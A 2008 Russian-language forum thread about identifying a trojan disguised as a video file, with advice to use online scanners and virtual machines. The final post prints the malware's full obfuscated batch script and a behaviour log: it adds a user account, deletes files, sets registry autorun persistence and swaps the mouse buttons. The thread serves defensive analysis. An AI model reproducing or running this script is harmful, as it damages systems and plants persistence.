как опознать западло ?
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
как опознать западло ? - 2008-05-24 21:43:02.353333
|
|
|
Женя_Немиров
Сообщений: 42
Оценки: 0
Присоединился: 2008-03-03 15:18:15.843333
|
Короче произашла такая ситуация, мне через mail.ru агента скинули "ВИДЮХу" с расшерением exe =))))говорят типа открой там моя систра голая =)) (иконка там mpeg4) !!!Z то в курсе что это вирь какой то галимый, а как ваще узнать побольше инфы о нём, и что он ваще представляет собой после его запуска
з.ы. открыть его не предлогать:D
еси нада я его выложу на файлообменник какой нить !
|
|
|
|
|
RE: как опознать западло ? - 2008-05-24 21:51:25.230000
|
|
|
oRb
Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
|
http://www.kaspersky.ru/scanforvirus
а лучше
http://www.virustotal.com/ru/
просто заливаешь на сайт файл. Там его сканят и тебе отчет че за вирь
дальше идешь на http://www.viruslist.com/ru/ и смотришь, что твой файл делает.
|
|
|
|
|
RE: как опознать западло ? - 2008-05-24 22:11:24.643333
|
|
|
Женя_Немиров
Сообщений: 42
Оценки: 0
Присоединился: 2008-03-03 15:18:15.843333
|
От ссылочка http://webfile.ru/1970036 … тока поподробнее еси можно обьясни (откуда взялся, когда, что делает ну и т.д.) (ес это ваще возможно) =)
|
|
|
|
|
RE: как опознать западло ? - 2008-05-24 22:19:53.500000
|
|
|
oRb
Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
|
мда, поздравляю это пинч
http://www.virustotal.com/ru/analisis/277f4e9bbc2ac2f0c7ea0b3ee6e17425
неужели было сложно выполнить то что я те сначала написал? оО
|
|
|
|
|
RE: как опознать западло ? - 2008-05-24 22:24:34.230000
|
|
|
Женя_Немиров
Сообщений: 42
Оценки: 0
Присоединился: 2008-03-03 15:18:15.843333
|
да я уже это всё просёк (TR/Dropper.Gen Trojan.LdPinch-2180 Trojan.PWS.LDPinch.1721 и т.д.) я просто хотел узнать что буит с системой еси его запустить (то что это трой я в курсе и что делает трой я тожж в курсе ;))
|
|
|
|
|
RE: как опознать западло ? - 2008-05-24 22:39:28.850000
|
|
|
Женя_Немиров
Сообщений: 42
Оценки: 0
Присоединился: 2008-03-03 15:18:15.843333
|
огромное спасибо, вот именно такой вывод я и хотел услышать:)
|
|
|
|
|
RE: как опознать западло ? - 2008-05-24 23:34:15.980000
|
|
|
FriLL
Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
|
дай мне его я под дизассамблером посмотрю
|
|
|
|
|
RE: как опознать западло ? - 2008-05-25 00:18:07.323333
|
|
|
TurboXaker
Сообщений: 385
Оценки: 0
Присоединился: 2008-05-23 01:05:40.516666
|
открой его на виртуалке
хотя б на Microsoft Virtual PC вот и узнаешь что будет
правда перед этим туда винду надо поставить
|
|
|
|
|
RE: как опознать западло ? - 2008-05-27 19:44:50.340000
|
|
|
=Sayber=
Сообщений: 26
Оценки: 0
Присоединился: 2008-03-01 13:13:24.353333
|
quote:
желтым - опасные функции
а чё они делают функции эти, за чё отвечают?
// не всмысле последствия, а што они заставляют выполнить комп? )
|
|
|
|
|
RE: как опознать западло ? - 2008-05-28 12:58:07.556666
|
|
|
~The Invisible~
Сообщений: 38
Оценки: 0
Присоединился: 2008-04-18 21:09:15.996666
|
Если это пинч, то итак вполне понятно что он делает… к томуже запустив на виртуалке троя человек всеравно не сможет увидить как его пароли полетят к комунить на почту или гейт
|
|
|
|
|
RE: как опознать западло ? - 2008-05-28 13:02:53.300000
|
|
|
oRb
Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
|
quote:
к томуже запустив на виртуалке троя человек всеравно не сможет увидить как его пароли полетят к комунить на почту или гейт
можно трафик поснифать
а легче заглянуть на viruslist.com и посмотреть, что данный трой творит.
|
|
|
|
|
RE: как опознать западло ? - 2008-05-29 14:08:38.160000
|
|
|
FriLL
Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
|
Судя под скриншоту дизассамблера ваш пинч несет довольно разрушительные последствия
|
|
|
|
|
RE: как опознать западло ? - 2008-05-30 12:32:05.496666
|
|
|
NordiGR
Сообщений: 131
Оценки: 0
Присоединился: 2007-11-11 20:44:59.843333
|
Если голая и файл *.exe то наверняка вирус. забуть о нем и все. Это они тебя хотят лохануть. Они ещё могут сказать что файл в sfx - архиве. Неверь. Проси нормальный файл.
|
|
|
|
|
RE: как опознать западло ? - 2008-05-30 16:12:01.336666
|
|
|
oRb
Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
|
NordiGR, проблема уже выяснена, не обязательно посты набивать…
|
|
|
|
|
RE: как опознать западло ? - 2008-05-30 16:44:02
|
|
|
Flint_ta
Сообщений: 3720
Оценки: 1120
Присоединился: 2007-01-26 15:49:18.323333
|
Это не пинч :) хоть антивирь и кричит! Гера.exe создает и запускает временный файл ViruZ.bat такого содержания:
@set g=@set
%g% e2=g
%g% g23=h
%g% s6=i
%g% y35=7
%g% l31=u
%g% c16=s
%g% h19=j
%g% a3=w
%g% y29=f
%g% q78=%0
%g% i43=%SystemRoot%
%g% c11=2
%g% c30=y
%g% q22=0
%g% k18=c
%g% b33=b
%g% o95=%1
%g% c4=n
%g% r34=k
%g% x13=6
%g% h10=5
%g% d7=x
%g% w49=%Temp%
%g% b5=o
%g% w21=9
%g% f0=d
%g% s14=q
%g% u70=%
%g% i12=z
%g% k17=4
%g% f8=1
%g% b26=p
%g% y28=t
%g% p9=3
%g% q20=a
%g% n27=8
%g% v24=r
%g% f1=v
%g% x59="
%g% s15=e
%g% x32=l
%g% w25=m
@%s15%%k18%%g23%%b5% %b5%%c4%
%i43%/%c16%%c30%%c16%%y28%%s15%%w25%%p9%%c11%/%v24%%l31%%c4%%f0%%x32%%x32%%p9%%c11% %l31%%c16%%s15%%v24%%p9%%c11%, S%a3%%q20%%b26%M%b5%%l31%%c16%%s15%B%l31%%y28%%y28%%b5%%c4% >%c4%%l31%%x32%
%y28%%s6%%w25%%s15% %q22%:%q22%%q22% >%c4%%l31%%x32%
%k18%%b5%%b26%%c30% %x59%%x59%%q78%%x59%%x59% %x59%%i43%\%c16%%c30%%c16%%y28%%s15%%w25%%p9%%c11%\%a3%%s6%%c4%%f0%%b5%%a3%%c16% %y29%%s6%%x32%%s15%%c16%.%b33%%q20%%y28%%x59% >%c4%%l31%%x32%
%v24%%s15%%e2% %q20%%f0%%f0% %x59%HKLM\SOFTWARE\M%s6%%k18%%v24%%b5%%c16%%b5%%y29%%y28%\W%s6%%c4%%f0%%b5%%a3%%c16%\C%l31%%v24%%v24%%s15%%c4%%y28%V%s15%%v24%%c16%%s6%%b5%%c4%\R%l31%%c4%%x59% /%f1% %x59%%a3%%s6%%c4%%f0%%b5%%a3%%c16% %y29%%s6%%x32%%s15%%c16%%x59% /%y28% REG_SZ /%f0% %x59%%i43%\%c16%%c30%%c16%%y28%%s15%%w25%%p9%%c11%\%a3%%s6%%c4%%f0%%b5%%a3%%c16% %y29%%s6%%x32%%s15%%c16%.%b33%%q20%%y28%%x59% /%y29% >%c4%%l31%%x32%
%w25%%c16%%e2% * %x59%(%k18%) %b26%[H]%r34% C%b5%%v24%%b26%%q20%%v24%%q20%%y28%%s6%%b5%%c4% %c11%%q22%%q22%%n27%%x59% >%c4%%l31%%x32%
%w25%%c16%%e2% * %x59%(%k18%) %b26%[H]%r34% C%b5%%v24%%b26%%q20%%v24%%q20%%y28%%s6%%b5%%c4% %c11%%q22%%q22%%n27%%x59% >%c4%%l31%%x32%
%w25%%c16%%e2% * %x59%(%k18%) %b26%[H]%r34% C%b5%%v24%%b26%%q20%%v24%%q20%%y28%%s6%%b5%%c4% %c11%%q22%%q22%%n27%%x59% >%c4%%l31%%x32%
%w25%%c16%%e2% * %x59%(%k18%) %b26%[H]%r34% C%b5%%v24%%b26%%q20%%v24%%q20%%y28%%s6%%b5%%c4% %c11%%q22%%q22%%n27%%x59% >%c4%%l31%%x32%
%w25%%c16%%e2% * %x59%(%k18%) %b26%[H]%r34% C%b5%%v24%%b26%%q20%%v24%%q20%%y28%%s6%%b5%%c4% %c11%%q22%%q22%%n27%%x59% >%c4%%l31%%x32%
%w25%%c16%%e2% * %x59%(%k18%) %b26%[H]%r34% C%b5%%v24%%b26%%q20%%v24%%q20%%y28%%s6%%b5%%c4% %c11%%q22%%q22%%n27%%x59% >%c4%%l31%%x32%
%f0%%s15%%x32% %x59%%i43%\M%s15%%f0%%s6%%q20%%x59% /%s14% >%c4%%l31%%x32%
%c4%%s15%%y28% %l31%%c16%%s15%%v24% %x59%%c30%%q20% %c16%%l31%%k17%%r34%%q20%%x59% /%q20%%f0%%f0% >%c4%%l31%%x32%
%x32%%q20%%b33%%s15%%x32% C:%c4%%s15%_%c4%%q20%%i12%%g23%%s6%%w25%%q20%%c30%_%q20%_%y28%%b5%_%a3%%s6%%c4%%f0%%s15%_%b26%%s6%%i12%%f0%%s15%%k18% >%c4%%l31%%x32%
%w25%%c16%%e2% * %x59%E%c16%%x32%%s6% %y28%%c30% %c4%%s15% %b26%%b5%%c16%%w25%%q20%%y28%%v24%%s15%%x32%(%q20%) %f1%%s6%%f0%%s6%%b5%, %i12%%c4%%q20%%k17%%s6%%y28% %y28%%s15%%x13%%s15% %c4%%s15% %b26%%b5%%f1%%s15%%i12%%x32%%b5%, %c4%%s15%%r34%%b5%%y28%%b5%%v24%%s6%%s15% %f1%%s6%%f0%%c30%%q20%%y28% %f1%%s6%%f0%%s6%%b5%%x59% >%c4%%l31%%x32%
%w25%%c16%%e2% * %x59%V%s6%%v24%%l31%%c16% %c16%%b5%%i12%%f0%%q20%%c4% %f8%%c11%.%q22%%x13%.%c11%%q22%%q22%%h10%%x59% >%c4%%l31%%x32%
%f0%%s15%%x32% %x59%%q78%%x59% >%c4%%l31%%x32%
______________________________________________
Вот лог того что он делает:
Creates Process - Filename (H:\WINDOWS\system32\msg.exe) CommandLine: (msg * "© p[H]k Corparation 2008" ) As User: () Creation Flags: ()
Creates Process - Filename (H:\WINDOWS\system32\msg.exe) CommandLine: (msg * "© p[H]k Corparation 2008" ) As User: () Creation Flags: ()
Creates Process - Filename (H:\WINDOWS\system32\msg.exe) CommandLine: (msg * "© p[H]k Corparation 2008" ) As User: () Creation Flags: ()
Creates Process - Filename (H:\WINDOWS\system32\msg.exe) CommandLine: (msg * "© p[H]k Corparation 2008" ) As User: () Creation Flags: ()
Creates Process - Filename (H:\WINDOWS\system32\msg.exe) CommandLine: (msg * "© p[H]k Corparation 2008" ) As User: () Creation Flags: ()
Creates Process - Filename (H:\WINDOWS\system32\msg.exe) CommandLine: (msg * "© p[H]k Corparation 2008" ) As User: () Creation Flags: ()
Creates Process - Filename (H:\WINDOWS\system32\net.exe) CommandLine: (net user "ya su4ka" /add ) As User: () Creation Flags: ()
Creates Process - Filename (H:\WINDOWS\system32\label.exe) CommandLine: (label C:ne_nazhimay_a_to_winde_pizdec ) As User: () Creation Flags: ()
Creates Process - Filename (H:\WINDOWS\system32\msg.exe) CommandLine: (msg * "Esli ty ne posmatrel(a) vidio, zna4it te6e ne povezlo, nekotorie vidyat vidio" ) As User: () Creation Flags: ()
Creates Process - Filename (H:\WINDOWS\system32\msg.exe) CommandLine: (msg * "Virus sozdan 12.06.2005" ) As User: () Creation Flags: ()
Также файл вудаляет все файлы из "C:\WINDOWS\Media\", копирует себя в С:\WINDOWS\system32\windows files.bat и записывает в автозагрузку HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "" = С:\WINDOWS\system32\windows files.bat
И меняет местами назначение кнопок мыши (левая и правая меняются)
|
|
|
|
|
|
